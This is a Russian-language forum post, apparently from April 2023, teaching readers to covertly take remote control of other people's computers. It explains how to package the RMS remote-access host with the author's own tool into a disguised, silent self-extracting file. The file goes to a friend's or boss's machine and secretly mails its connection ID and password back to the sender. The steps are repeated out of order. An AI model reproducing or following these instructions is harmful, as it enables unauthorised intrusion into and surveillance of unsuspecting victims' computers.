- 15, Apr 2023
Здравствуйте. Предлагаю вашему вниманию скрытое администрирование компьютерами . Статья сделана в ознакомительных целях.
Мы будем скрытно удминистрировать компьютерами.
1.Скачиваем и устанавливаем viewer (host можно удалить ) :
ЭТО ВАЖНО!!! Ссылка на видео : ( про коментарий смотреть с 1.25 мин , но лучше смотрите полностью от начала и до конца , чтобы не было вопросов) Ссылка на программу :
4.Отправляем наш файл на компьютер который хотим администрировать (друга , ваш компютер , компьютер босса и т.д) . Человек открывает файл и ничего не происходит у него , а нам уже на маил пришли ID и пас для подключения.
5.Заходим в Viewer . Жмем -добавить соединение- , вводим ID - выбираем что мы хотим делать-жмем ок-вводим пароль который пришел на мыло-администрируем.
P.S тулзу писал я , если есть баги - пишите исправлю.
Если что то не получается , пишите - помогу.
Не надо писать -ааа , не работает , фигня- из-за того , что у вас не получается ... Если надо ,могу записать подробное видео.
на VT залейте сами , если сомневаетесь
1.Скачиваем и устанавливаем viewer (host можно удалить ) :
2. Cкачиваем мою тулзу для быстрой настройки сервера . Посмотрите так-же видео , там рассказано какие строки надо поменять в коментарии архива.
https://rmansys.ru/files/
. Качайте : "
RMS Удаленный доступ — полная версия"
ЭТО ВАЖНО!!! Ссылка на видео : ( про коментарий смотреть с 1.25 мин , но лучше смотрите полностью от начала и до конца , чтобы не было вопросов) Ссылка на программу :
3.Все скачали , установили viewer , отлично. Повторяем все по видео : или текстом опишу :
1-под видео есть ссылка . 2-http://rlu.ru/0230qn
Запускаем тулзу (Project1.exe) . Выбираем mail . Вписывайте ваш маил в первую строку ( туда будут приходить id и пароль для подключения) . Выбираем маскировку(по желанию) и нажимаем EXTRACT . В папке с прогой появятся файлы , открываем НЕ SES.REG файл через winrar и перетаскиваем туда ses.reg . Заходим в COMENTS и меняем строчку Setup=hide.bat.lnk на Setup=1597.bat . Готово .
4.Отправляем наш файл на компьютер который хотим администрировать (друга , ваш компютер , компьютер босса и т.д) . Человек открывает файл и ничего не происходит у него , а нам уже на маил пришли ID и пас для подключения.
5.Заходим в Viewer . Жмем -добавить соединение- , вводим ID - выбираем что мы хотим делать-жмем ок-вводим пароль который пришел на мыло-администрируем.
P.S тулзу писал я , если есть баги - пишите исправлю.
Если что то не получается , пишите - помогу.
Не надо писать -ааа , не работает , фигня- из-за того , что у вас не получается ... Если надо ,могу записать подробное видео.
на VT залейте сами , если сомневаетесь